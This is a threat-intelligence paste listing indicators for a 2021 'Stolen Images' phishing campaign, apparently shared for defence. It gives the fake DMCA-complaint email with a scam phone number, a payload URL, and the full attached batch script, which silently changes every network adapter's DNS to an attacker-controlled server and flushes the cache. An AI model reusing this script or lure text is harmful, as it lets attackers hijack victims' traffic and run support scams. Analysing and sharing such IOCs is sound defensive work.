ExecuteMalware

2021-08-05 StolenImages Campaign IOCs

Aug 5th, 2021
14,797
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.37 KB | None | 0 0
  1. THREAT ATTRIBUTION: STOLEN IMAGES / UNKNOWN
  2.  
  3. The Email had an attached .bat file
  4.  
  5. SUBJECTS OBSERVED
  6. Contact your provider's technical support immediately 1 (877) 5471-430 .Copyright infringement complaint
  7.  
  8. SENDERS OBSERVED
  9.  
  10. STOLEN IMAGES PAYLOAD URL
  11. https://fvcalw.de/dirwp.php
  12.  
  13. EMAIL BODY
  14. Technical department for dealing with complaints of copyright holders
  15. 1 (877) 5471-430
  16.  
  17. Contact your provider's technical support immediately
  18.  
  19. We always respond to copyright infringement notices. Content posted from your device violates the US Digital Millennium Copyright Act (DMCA)
  20.  
  21. Call is free for us residents
  22.  
  23. Read the full text of the complaint
  24. About
  25.  
  26. Technical Department
  27.  
  28. Contact Info
  29.  
  30. 203 St. Mountain View, San Francisco, California, USA
  31. 1 (877) 5471-430
  32.  
  33. Useful Links
  34. 1 (877) 5471-430
  35.  
  36. Useful Links
  37. © 2021 Stories. All Rights Reserved
  38.  
  39. Cancel Subscription
  40.  
  41. SUPPORTING EVIDENCE
  42. The attached .bat file contents:
  43. @ECHO OFF
  44.  
  45. SETLOCAL EnableDelayedExpansion
  46.  
  47. :ETHERNET
  48.  
  49. SET adapterName=
  50.  
  51. FOR /F "tokens=* delims=:" %%a IN ('IPCONFIG ^| FIND /I "ETHERNET ADAPTER"') DO (
  52. SET adapterName=%%a
  53.  
  54. REM Removes "Ethernet adapter" from the front of the adapter name
  55. SET adapterName=!adapterName:~17!
  56.  
  57. REM Removes the colon from the end of the adapter name
  58. SET adapterName=!adapterName:~0,-1!
  59.  
  60. rem ECHO !adapterName!
  61.  
  62. netsh interface ipv4 set dns name="!adapterName!" static 45.138.72.52 primary
  63. netsh interface ipv6 set dns name="!adapterName!" static ::1 primary
  64. timeout /t 2
  65. netsh interface set interface "!adapterName!" DISABLED
  66. timeout /t 2
  67. netsh interface set interface "!adapterName!" ENABLED
  68. rem netsh interface ipv4 add dns name="!adapterName!" 192.168.0.3 index=2
  69. )
  70.  
  71. :WIRELESS
  72.  
  73. FOR /F "tokens=* delims=:" %%a IN ('IPCONFIG ^| FIND /I "WIRELESS LAN ADAPTER"') DO (
  74. SET adapterName=%%a
  75.  
  76. REM Removes "Wireless LAN adapter" from the front of the adapter name
  77. SET adapterName=!adapterName:~21!
  78.  
  79. REM Removes the colon from the end of the adapter name
  80. SET adapterName=!adapterName:~0,-1!
  81.  
  82. rem ECHO !adapterName!
  83.  
  84. netsh interface ipv4 set dns name="!adapterName!" static 45.138.72.52 primary
  85. netsh interface ipv6 set dns name="!adapterName!" static ::1 primary
  86. timeout /t 2
  87. netsh interface set interface "!adapterName!" DISABLED
  88. timeout /t 2
  89. netsh interface set interface "!adapterName!" ENABLED
  90. )
  91.  
  92. ipconfig /flushdns
  93.  
  94. :EOF
  95.  
Advertisement
Add Comment
Please, Sign In to add comment